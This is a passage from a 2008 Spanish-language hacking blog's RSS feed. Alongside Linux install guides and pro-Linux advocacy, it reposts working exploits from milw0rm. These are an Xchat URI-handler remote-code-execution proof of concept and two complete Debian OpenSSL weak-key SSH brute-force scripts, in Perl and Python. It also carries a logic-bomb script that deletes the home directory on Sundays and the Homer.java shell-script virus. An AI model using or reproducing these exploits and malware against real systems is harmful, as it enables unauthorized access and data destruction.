/&gt;bt~#mount -t proc proc /mnt/backtrack3/proc/&lt;br /&gt;bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/&lt;br /&gt;&lt;br /&gt;Para agregarlo al grub en mi cas solo edite el archivo menu.lst de mi debian.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;bt ~ # fdisk -l&lt;br /&gt;&lt;br /&gt;Disk /dev/sda: 60.0 GB, 60011642880 bytes&lt;br /&gt;255 heads, 63 sectors/track, 7296 cylinders&lt;br /&gt;Units = cylinders of 16065 * 512 = 8225280 bytes&lt;br /&gt;&lt;br /&gt;   Device Boot      Start         End      Blocks   Id  System&lt;br /&gt;/dev/sda1   *           1          34      273073+  83  Linux&lt;br /&gt;/dev/sda2              35        7296    58332015    5  Extended&lt;br /&gt;/dev/sda5              35         642     4883728+  83  Linux&lt;br /&gt;/dev/sda6             643        1007     2931831   83  Linux&lt;br /&gt;/dev/sda7            1008        1337     2650693+  82  Linux swap&lt;br /&gt;/dev/sda8            1338        1386      393561   83  Linux&lt;br /&gt;/dev/sda9            1387        6019    37214541   83  Linux&lt;br /&gt;/dev/sda10           6020        7296    10257471   83  Linux&lt;br /&gt;&lt;br /&gt;Disk /dev/sdb: 123.5 GB, 123522416640 bytes&lt;br /&gt;255 heads, 63 sectors/track, 15017 cylinders&lt;br /&gt;Units = cylinders of 16065 * 512 = 8225280 bytes&lt;br /&gt;&lt;br /&gt;   Device Boot      Start         End      Blocks   Id  System&lt;br /&gt;/dev/sdb1   *           1       15017   120624021    7  HPFS/NTFS&lt;br /&gt;&lt;br /&gt;como podran ver fue en la /dev/sda10 donde instale el back|track3&lt;br /&gt;entonses:&lt;br /&gt;&lt;br /&gt;Entre en el archivo menu.lst de debian y lo edite&lt;br /&gt;&lt;br /&gt;#nano /boot/grub/menu.lst&lt;br /&gt;&lt;br /&gt;title  Back|track3&lt;br /&gt;root  (hd0,9)&lt;br /&gt;kernel  /boot/vmlinuz root=/dev/sda10 ro&lt;br /&gt;&lt;br /&gt;con eso fue mas que suficiente para tener back|track3 en mi HD.&lt;br /&gt;&lt;br /&gt;aqui el link para descargar &lt;a href="http://remote-exploit.org/backtrack_download.html"&gt; BACK|TRACK3 &lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6138677000830985770?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/06/como-instalar-backtrack-3.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-5661077174327031042</guid><pubDate>Thu, 19 Jun 2008 01:00:00 +0000</pubDate><atom:updated>2008-06-18T20:14:07.813-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Instalar emesene</category><category domain='http://www.blogger.com/atom/ns#'>messenger en linux</category><title>Instalar emesene</title><description>emsn es un cliente de mensageria similar al msn. la verdad en lo personal aun prefiero pidgin pero pues siempre hay mas altertativas que probar.&lt;br /&gt;&lt;br /&gt;Primero editamos nuestro sources.list&lt;br /&gt;&lt;br /&gt;#pico /etc/apt/sources.list&lt;br /&gt;&lt;br /&gt;Y agregamos los repos.&lt;br /&gt;&lt;br /&gt;deb http://apt.emesene.org/ ./&lt;br /&gt;deb-src http://apt.emesene.org/ ./&lt;br /&gt;&lt;br /&gt;haora.&lt;br /&gt;&lt;br /&gt;#apt-get update&lt;br /&gt;&lt;br /&gt;y haora instalamos.&lt;br /&gt;&lt;br /&gt;#apt-get install emesene &lt;br /&gt;&lt;br /&gt;Y listo.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5661077174327031042?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/06/instalar-emesene.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>2</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-3666056715718902392</guid><pubDate>Fri, 13 Jun 2008 17:11:00 +0000</pubDate><atom:updated>2008-06-13T12:26:23.343-05:00</atom:updated><title>Xchat &lt;= 2.8.7b Remote Code Execution</title><description>##################################################################################################################&lt;br /&gt;#&lt;br /&gt;# Xchat &lt;= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 &amp; IE7 fully patched)&lt;br /&gt;# Vendor : http://xchat.org/&lt;br /&gt;# Affected Os : Windows *&lt;br /&gt;# Risk : critical&lt;br /&gt;#&lt;br /&gt;# This bug is related to the URI Handler vulnerability but the approch is a bit different.&lt;br /&gt;# We don't use any % or  ../../../ as the others related bugs, just a single "&lt;br /&gt;# According to the registry , when the IRCS:// URI is called , the command launched is :&lt;br /&gt;# C:\Program Files\xchat\xchat.exe --existing --url="%1"&lt;br /&gt;#&lt;br /&gt;# The xchat --help option tells us :&lt;br /&gt;# " --command=COMMAND :Send a command to existing xchat "&lt;br /&gt;#&lt;br /&gt;# So we add a simple " at the end of the URL and we're in business ?&lt;br /&gt;# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"&lt;br /&gt;#&lt;br /&gt;# Note: The victim needs to be connected to an irc server , and also need IE * .&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# Greetz: French/Quebec community, http://spiritofhack.net/&lt;br /&gt;#&lt;br /&gt;# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"&lt;br /&gt;#&lt;br /&gt;# Poc: this only launch the calc, sky is the limit passed this point.&lt;br /&gt;&lt;br /&gt;html&lt;br /&gt; head title Welcome to my personal website /title /head&lt;br /&gt; body&lt;br /&gt; script document.location='ircs://blabla@3.3.3.3" --command "shell calc"'/script&lt;br /&gt; /body&lt;br /&gt; /html &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###http://www.milw0rm.com/#####&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-3666056715718902392?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/06/xchat-287b-remote-code-execution.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-1419541233215038245</guid><pubDate>Wed, 11 Jun 2008 05:10:00 +0000</pubDate><atom:updated>2008-06-11T00:13:42.963-05:00</atom:updated><title>P2P         =)</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_OdUSaKBFEPk/SE9e97UMTxI/AAAAAAAAAJI/N-ZE9WekB_Y/s1600-h/p2p.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_OdUSaKBFEPk/SE9e97UMTxI/AAAAAAAAAJI/N-ZE9WekB_Y/s320/p2p.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5210487711878369042" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-1419541233215038245?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/06/p2p.html</link><author>noreply@blogger.com (zerial killer)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_OdUSaKBFEPk/SE9e97UMTxI/AAAAAAAAAJI/N-ZE9WekB_Y/s72-c/p2p.jpg' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-4168713931773458287</guid><pubDate>Mon, 02 Jun 2008 20:42:00 +0000</pubDate><atom:updated>2008-06-02T15:46:40.712-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>exploit OpenSSL</category><category domain='http://www.blogger.com/atom/ns#'>ssh</category><title>Exploit SSH ---&gt; OpenSSL</title><description>dandome unas visitas por milworm encontre :&lt;br /&gt;&lt;br /&gt;Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit&lt;br /&gt;&lt;br /&gt;the debian openssl issue leads that there are only 65.536 possible ssh &lt;br /&gt;keys generated, cause the only entropy is the pid of the process &lt;br /&gt;generating the key.&lt;br /&gt;&lt;br /&gt;This leads to that the following perl script can be used with the &lt;br /&gt;precalculated ssh keys to brute force the ssh login. It works if such a &lt;br /&gt;keys is installed on a non-patched debian or any other system manual &lt;br /&gt;configured to.&lt;br /&gt;&lt;br /&gt;On an unpatched system, which doesn't need to be debian, do the following:&lt;br /&gt;&lt;br /&gt;keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/&lt;br /&gt;&lt;br /&gt;1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2&lt;br /&gt;	    http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2&lt;br /&gt;&lt;br /&gt;2. Extract it to a directory&lt;br /&gt;&lt;br /&gt;3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 &lt;br /&gt;Bits, generated on an upatched debian (this is the key this exploit will &lt;br /&gt;break)&lt;br /&gt;&lt;br /&gt;4. Run the perl script and give it the location to where you extracted &lt;br /&gt;the bzip2 mentioned.&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;my $keysPerConnect = 6;&lt;br /&gt;unless ($ARGV[1]) {&lt;br /&gt;   print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";&lt;br /&gt;   print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";&lt;br /&gt;   print "By mm@deadbeef.de\n";&lt;br /&gt;   exit 0;&lt;br /&gt;}&lt;br /&gt;chdir($ARGV[0]);&lt;br /&gt;opendir(A, $ARGV[0]) || die("opendir");&lt;br /&gt;while ($_ = readdir(A)) {&lt;br /&gt;   chomp;&lt;br /&gt;   next unless m,^\d+$,;&lt;br /&gt;   push(@a, $_);&lt;br /&gt;   if (scalar(@a) &gt; $keysPerConnect) {&lt;br /&gt;      system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i &lt;br /&gt;".$_ } @a)." ".$ARGV[1]);&lt;br /&gt;      @a = ();&lt;br /&gt;   }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;5. Enjoy the shell after some minutes (less than 20 minutes)&lt;br /&gt;&lt;br /&gt;Regards,&lt;br /&gt;Markus Mueller&lt;br /&gt;mm@deadbeef.de&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2008-05-15]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Y TAMBIEN &lt;br /&gt;&lt;br /&gt;Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#!/bin/python&lt;br /&gt;#       This program is free software; you can redistribute it and/or modify&lt;br /&gt;#       it under the terms of the GNU General Public License as published by&lt;br /&gt;#       the Free Software Foundation; either version 2 of the License, or&lt;br /&gt;#       (at your option) any later version.&lt;br /&gt;#&lt;br /&gt;#       This program is distributed in the hope that it will be useful,&lt;br /&gt;#       but WITHOUT ANY WARRANTY; without even the implied warranty of&lt;br /&gt;#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the&lt;br /&gt;#       GNU General Public License for more details.&lt;br /&gt;#&lt;br /&gt;#       You should have received a copy of the GNU General Public License&lt;br /&gt;#       along with this program; if not, write to the Free Software&lt;br /&gt;#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,&lt;br /&gt;#       MA 02110-1301, USA.&lt;br /&gt;############################################################################&lt;br /&gt;# Autor: hitz - WarCat team (warcat.no-ip.org)&lt;br /&gt;# Collaborator: pretoriano&lt;br /&gt;#&lt;br /&gt;# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2&lt;br /&gt;#             http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2&lt;br /&gt;#&lt;br /&gt;# 2. Extract it to a directory&lt;br /&gt;#&lt;br /&gt;# 3. Execute the python script&lt;br /&gt;#     - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5&lt;br /&gt;#     - execute: python exploit.py (without parameters) to display the help&lt;br /&gt;#     - if the key is found, the script shows something like that:&lt;br /&gt;#         Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121&lt;br /&gt;#		  Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240&lt;br /&gt;############################################################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;import Queue&lt;br /&gt;import os&lt;br /&gt;import string&lt;br /&gt;import time&lt;br /&gt;from threading import Thread&lt;br /&gt;import sys&lt;br /&gt;&lt;br /&gt;#This class only has a boolean, which will be True if some thread find the key&lt;br /&gt;class End():&lt;br /&gt;	def __init__(self):&lt;br /&gt;		self.end = False&lt;br /&gt;		&lt;br /&gt;	def Finish(self):&lt;br /&gt;		self.end = True&lt;br /&gt;	&lt;br /&gt;	def GetEnd(self):&lt;br /&gt;		return self.end	&lt;br /&gt;		&lt;br /&gt;&lt;br /&gt;#This is the thread class&lt;br /&gt;class Connection(Thread):&lt;br /&gt;	def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):&lt;br /&gt;		Thread.__init__(self)&lt;br /&gt;		self.QueueDir = QueueDir&lt;br /&gt;		self.TheEnd = TheEnd&lt;br /&gt;		self.dir = dir&lt;br /&gt;		self.host = host&lt;br /&gt;		self.user = user&lt;br /&gt;		self.port = port&lt;br /&gt;			&lt;br /&gt;	def run(self):&lt;br /&gt;		while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):&lt;br /&gt;			key = self.QueueDir.get()&lt;br /&gt;			&lt;br /&gt;			cmd = 'ssh -l ' + self.user &lt;br /&gt;			cmd = cmd + ' -p ' + self.port &lt;br /&gt;			cmd = cmd + ' -o PasswordAuthentication=no'&lt;br /&gt;			cmd = cmd + ' -i ' + self.dir + '/' + key &lt;br /&gt;			cmd = cmd + ' ' + self.host + ' exit; echo $?'&lt;br /&gt;			&lt;br /&gt;			pin,pout,perr = os.popen3(cmd, 'r')&lt;br /&gt;			pin.close()&lt;br /&gt;			&lt;br /&gt;			#To debug descoment the next line. This will show the errors reported by ssh&lt;br /&gt;			#print perr.read()&lt;br /&gt;			&lt;br /&gt;			if pout.read().lstrip().rstrip() == '0':&lt;br /&gt;				self.TheEnd.Finish()&lt;br /&gt;				print ''&lt;br /&gt;				print 'Key Found in file: '+ key&lt;br /&gt;				print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host) &lt;br /&gt;				print ''&lt;br /&gt;		&lt;br /&gt;print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org' &lt;br /&gt;&lt;br /&gt;if len(sys.argv) &lt; 4:&lt;br /&gt;	print './exploit.py &lt;dir&gt; &lt;host&gt; &lt;user&gt; [[port] [threads]]'&lt;br /&gt;	print '    &lt;dir&gt;: Path to SSH privatekeys (ex. /home/john/keys) without final slash'&lt;br /&gt;	print '    &lt;host&gt;: The victim host'&lt;br /&gt;	print '    &lt;user&gt;: The user of the victim host'	&lt;br /&gt;	print '    [port]: The SSH port of the victim host (default 22)'&lt;br /&gt;	print '    [threads]: Number of threads (default 4) Too big numer is bad'&lt;br /&gt;	&lt;br /&gt;	sys.exit(1)&lt;br /&gt;	&lt;br /&gt;dir = sys.argv[1]&lt;br /&gt;host = sys.argv[2]&lt;br /&gt;user = sys.argv[3]&lt;br /&gt;&lt;br /&gt;if len(sys.argv) &lt;= 4: &lt;br /&gt;	  port='22'&lt;br /&gt;	  threads=4&lt;br /&gt;else:&lt;br /&gt;	if len(sys.argv) &lt;=5:&lt;br /&gt;		port=sys.argv[4]&lt;br /&gt;		threads = 4&lt;br /&gt;&lt;br /&gt;	else:&lt;br /&gt;		port=sys.argv[4]	&lt;br /&gt;		threads = sys.argv[5]&lt;br /&gt;&lt;br /&gt;ListDir = os.listdir(dir)&lt;br /&gt;QueueDir=Queue.Queue()&lt;br /&gt;TheEnd = End()&lt;br /&gt;&lt;br /&gt;for i in range(len(ListDir)):&lt;br /&gt;	if ListDir[i].find('.pub') == -1:	&lt;br /&gt;		QueueDir.put(ListDir[i])&lt;br /&gt;&lt;br /&gt;initsize = QueueDir.qsize()&lt;br /&gt;tested = 0&lt;br /&gt;&lt;br /&gt;for i in range(0,int(threads)):&lt;br /&gt;	Connection(QueueDir,TheEnd,dir,host,user,port).start()&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;while (not TheEnd.GetEnd()) and (not QueueDir.empty()):&lt;br /&gt;	time.sleep(5)&lt;br /&gt;	actsize = QueueDir.qsize()&lt;br /&gt;	speed = (initsize - tested - actsize)/5&lt;br /&gt;	tested = initsize - actsize&lt;br /&gt;	&lt;br /&gt;	print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed) &lt;br /&gt;&lt;br /&gt;# milw0rm.com [2008-06-01]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-4168713931773458287?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/06/exploit-ssh-openssl.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-7723644211257469277</guid><pubDate>Sat, 31 May 2008 21:08:00 +0000</pubDate><atom:updated>2008-05-31T16:24:33.558-05:00</atom:updated><title>Metagoofil</title><description>Metagoofil es una Herramienta para obtener información de documentos públicos. Metagoofil nos ayuda a obtener una lista de usuarios, para poder realizar ataques de fuerza bruta sobre los servicios disponibles (FTP, VPN, Aplicaciones WEB, POP3).&lt;br /&gt;&lt;br /&gt;Metagoofil es una herramienta que se encarga de extraer Meta-Data (Datos sobre los Datos), de ciertos ficheros accesibles en los webs del "objetivo".&lt;br /&gt;&lt;br /&gt;Si Quieren saber como funciona cheken la web de &lt;a href="http://www.s21sec.com/metagoofil/metagoofil.html"&gt;Metagoofil&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-7723644211257469277?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/05/metagoofil.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-5698182126286173472</guid><pubDate>Wed, 28 May 2008 01:38:00 +0000</pubDate><atom:updated>2008-05-27T20:41:02.030-05:00</atom:updated><title>Bombas lógicas</title><description>Las bombas lógicas son en cierta forma similares a los troyanos: se trata de código insertado en programas que parecen realizar cierta acción útil. Pero mientras que un troyano se ejecuta cada vez que se ejecuta el programa que lo contiene, una bomba lógica sólo se activa bajo ciertas condiciones, como una determinada fecha, la existencia de un fichero con un nombre dado, o el alcance de cierto número de ejecuciones del programa que contiene la bomba; así, una bomba lógica puede permanecer inactiva en el sistema durante mucho tiempo sin activarse y por tanto sin que nadie note un funcionamiento anómalo hasta que el daño producido por la bomba ya está hecho. Por ejemplo, imaginemos la misma situación que antes veíamos para el troyano: alguien con el suficiente privilegio renombra a vi como vi.old, y en el lugar del editor sitúa el siguiente código:&lt;br /&gt;&lt;br /&gt;#!/bin/sh&lt;br /&gt;if [ `date +%a` = "Sun" ]; &lt;br /&gt;    then&lt;br /&gt;        rm -rf $HOME&lt;br /&gt;    else&lt;br /&gt;        vi.old $1&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;Este cambio en el sistema puede permanecer durante años sin que se produzca un funcionamiento anómalo, siempre y cuando nadie edite ficheros un domingo; pero en el momento en que un usuario decida trabajar este día, la bomba lógica se va a activar y el directorio de este usuario será borrado.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5698182126286173472?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/05/bombas-lgicas.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-2107186878144954506</guid><pubDate>Wed, 28 May 2008 01:24:00 +0000</pubDate><atom:updated>2008-05-27T20:33:20.662-05:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>applets</category><category domain='http://www.blogger.com/atom/ns#'>hostiles</category><category domain='http://www.blogger.com/atom/ns#'>applets hostiles</category><title>Applets hostiles</title><description>En los últimos años, con la proliferación de la web, Java y Javascript, una nueva forma de malware se ha hecho popular. estos instentan monopolizar o explotar los recursos del sistema de una forma inapropiada, esto incluye desde ataques clásicos como negaciones de servicio o ejecución remota de programas en la máquina cliente hasta amenazas mucho más elaboradas, como difusión de virus, ruptura lógica de cortafuegos o utilización de recursos remotos para grandes cálculos científicos. &lt;br /&gt;&lt;br /&gt;Como ejemplo de applet hostil - aunque este en concreto no es muy peligroso - tenemos el siguiente código, obra de Mark D. LaDue (1996):&lt;br /&gt;&lt;br /&gt;zkk:~/Security# cat Homer.java&lt;br /&gt;import java.io.*;&lt;br /&gt;&lt;br /&gt;class Homer {&lt;br /&gt;    public static void main (String[] argv) {&lt;br /&gt;    try {&lt;br /&gt;        String userHomer = System.getProperty("user.home");&lt;br /&gt;        String target = "$HOME";&lt;br /&gt;        FileOutputStream outer = new &lt;br /&gt;                 FileOutputStream(userHome + "/.homer.sh");&lt;br /&gt;        String homer = "#!/bin/sh" + "\n" + "#-_" + "\n" +&lt;br /&gt;        "echo \"Java is safe, and UNIX viruses do not exist.\"" + "\n" +&lt;br /&gt;        "for file in `find " + target + " -type f -print`" + "\n" + "do" +&lt;br /&gt;        "\n" + "    case \"`sed 1q $file`\" in" + "\n" +&lt;br /&gt;        "        \"#!/bin/sh\" ) grep '#-_' $file &gt; /dev/null" +&lt;br /&gt;        " || sed -n '/#-_/,$p' $0 &gt;&gt; $file" + "\n" +&lt;br /&gt;        "    esac" + "\n" + "done" + "\n" + &lt;br /&gt;        "2&gt;/dev/null";&lt;br /&gt;        byte[] buffer = new byte[homer.length()];&lt;br /&gt;        homer.getBytes(0, homer.length(), buffer, 0);&lt;br /&gt;        outer.write(buffer);&lt;br /&gt;        outer.close();&lt;br /&gt;        Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " +&lt;br /&gt;                        userHome + "/.homer.sh");&lt;br /&gt;        Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome +&lt;br /&gt;                       "/.homer.sh");&lt;br /&gt;        } catch (IOException ioe) {}&lt;br /&gt;    }&lt;br /&gt;}&lt;br /&gt;zkk:~/Security#&lt;br /&gt;&lt;br /&gt;Este programa infecta los sistemas Unix con un virus que contamina ficheros shellscript; antes de hacerlo muestra el mensaje `Java is safe, and UNIX viruses do not exist', para después localizar todos los ficheros shell en el directorio $HOME, comprobar cuáles están infectados, e infectar los que no lo están.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2107186878144954506?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/05/applets-hostiles.html</link><author>noreply@blogger.com (zerial killer)</author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>3</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-8418571820237963311</guid><pubDate>Wed, 21 May 2008 19:31:00 +0000</pubDate><atom:updated>2008-05-21T14:34:56.150-05:00</atom:updated><title>Llegaron los discos de ubuntu =)</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_OdUSaKBFEPk/SDR5PDnrHwI/AAAAAAAAAJA/dg5RGiDOYWY/s1600-h/ubuntu"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_OdUSaKBFEPk/SDR5PDnrHwI/AAAAAAAAAJA/dg5RGiDOYWY/s320/ubuntu" border="0" alt=""id="BLOGGER_PHOTO_ID_5202916769096474370" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Hoy me han llegado los discos de GNU/LINUX ubuntu para 64 y 32 bits, yo no utilizo esta distribución pero muchas personas que conozco si, adames de que las regalo para las personas que se van iniciando en esto que es el mundo de GNU/LINUX. &lt;br /&gt;&lt;br /&gt;Todas las personas que quieran un disco solo hagan meló saber con gusto se las daré.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-8418571820237963311?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://zerialkiller.blogspot.com/2008/05/llegaron-los-discos-de-ubuntu.html</link><author>noreply@blogger.com (zerial killer)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_OdUSaKBFEPk/SDR5PDnrHwI/AAAAAAAAAJA/dg5RGiDOYWY/s72-c/ubuntu' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-11983284204523461.post-1136468021959011306</guid><pubDate>Tue, 20 May 2008 23:28:00 +0000</pubDate><atom:updated>2008-05-20T18:30:50.707-05:00</atom:updated><title>Mas de 25 razones de peso para migrar a GNU/Linux</title><description>1 - Debido a que está licenciado bajo licencia GPL, GNU/Linux (así como todo el software libre) está disponible sin ningún coste. Puede ser descargado de Internet de forma gratuita, y puede ser adquirido en formato CD o DVD con un coste muy trivial. Una copia puede ser utilizada en tantos ordenadores como queramos sin restricciones. Si comparamos con Microsoft Windows, solo el sistema operativo nos costará por lo menos 100 € por ordenador.&lt;br /&gt;&lt;br /&gt;2 - Debido a que es software libre, GNU/Linux también es gratuito en el sentido de que cualquiera está autorizado a modificar, incluso su código fuente, de cualquier forma deseada. Si las versiones modificadas no son re-distribuidas, los cambios pueden mantenerse en secreto. Esto también choca bastante con Microsoft Windows, ya que las modificaciones no están permitidas. El código fuente es la versión original de un programa tal y como lo haya escrito un programador usando un lenguaje de programación y antes de ser compilado de forma que sus instrucciones puedan ser entendidas directamente por un ordenador. Por lo tanto, es necesario tener el código fuente con el fin de poder realizar cambios en un determinado programa. Esta capacidad de experimentar con el código fuente, y hacerlo sin necesidad de dar a conocer las modificaciones a terceros ha sido muy importante para un gran numero de organizaciones.&lt;br /&gt;&lt;br /&gt;3 - GNU/Linux cuenta con un soporte de alta calidad disponible de forma gratuita a través de Internet, en grupos de noticias y foros. Algunas personas afirman que este soporte es al menos tan bueno como en el software privativo, que además funciona, evidentemente, pagando. GNU/Linux puede adquirirse si se desea de forma comercial. Existen empresas que basan su negocio del software libre en negocio de servicios. Dan soporte de instalación de aplicaciones, parches para hacer frente a nuevas amenazas de seguridad y parches para arreglar bugs descubiertos recientemente. En GNU/Linux estos 2 últimos son relativamente infrecuentes...&lt;br /&gt;&lt;br /&gt;4 - Hay muy pocas posibilidades de que el soporte técnico para algún sistema GNU/Linux se elimine porque el software haya quedado obsoleto o por cualquier otro motivo. Esto se debe a que el código fuente estará siempre disponible para cualquier persona que lo desee, incluidas aquellas personas que prestan dicho soporte de forma gratuita en Internet y también para aquellas empresas que basan su negocio en los servicios. Por el contrario Microsoft Windows, y otros programas privativos cuyo código fuente es mantenido en secreto, la obtención de soporte técnico se complica si la compañía que lo vende decide retirar el software con el fin de tratar de obligar al usuario a pagar por la nueva versión, por ejemplo.&lt;br /&gt;&lt;br /&gt;5 - No existe ningún temor a que las aplicaciones se queden obsoletas con GNU/Linux. Esto se debe a que la arquitectura UNIX en la que se basan ha sido exhaustivamente probada y refinada durante más de 35 años y ha demostrado ser extremadamente eficaz, robusta y segura. Las mejoras se realizan a un ritmo rápido, pero las nuevas versiones siguen siendo compatibles con la arquitectura UNIX subyacente.&lt;br /&gt;&lt;br /&gt;6 - No hay actualizaciones obligatorias para los usuarios de GNU/Linux. Esto se debe a que las versiones antiguas siguen siendo soportadas (por ejemplo, con el desarrollo de nuevos parches de seguridad y controladores de dispositivo) y porque las nuevas versiones, si así lo desean, están disponibles de forma gratuita y suelen ser compatibles con versiones anteriores. Los desarrolladores de software propietario, sin embargo, tienen fuertes incentivos financieros para planificar el que una determinada versión quede obsoleta. Su objetivo será inducir a los usuarios de versiones anteriores a gastar dinero para comprar o actualizar a las nuevas versiones.&lt;br /&gt;&lt;br /&gt;7 - En caso de que un usuario decida actualizar a una versión más reciente de GNU/Linux, no hay derechos de licencia de software u otros gastos si el usuario selecciona una distribución libre. Por otra parte, la formación, modificaciones, adquisición de hardware y otros costos relacionados con una actualización a una nueva versión son también relativamente bajos debido a la compatibilidad con versiones anteriores.&lt;br /&gt;&lt;br /&gt;8 - 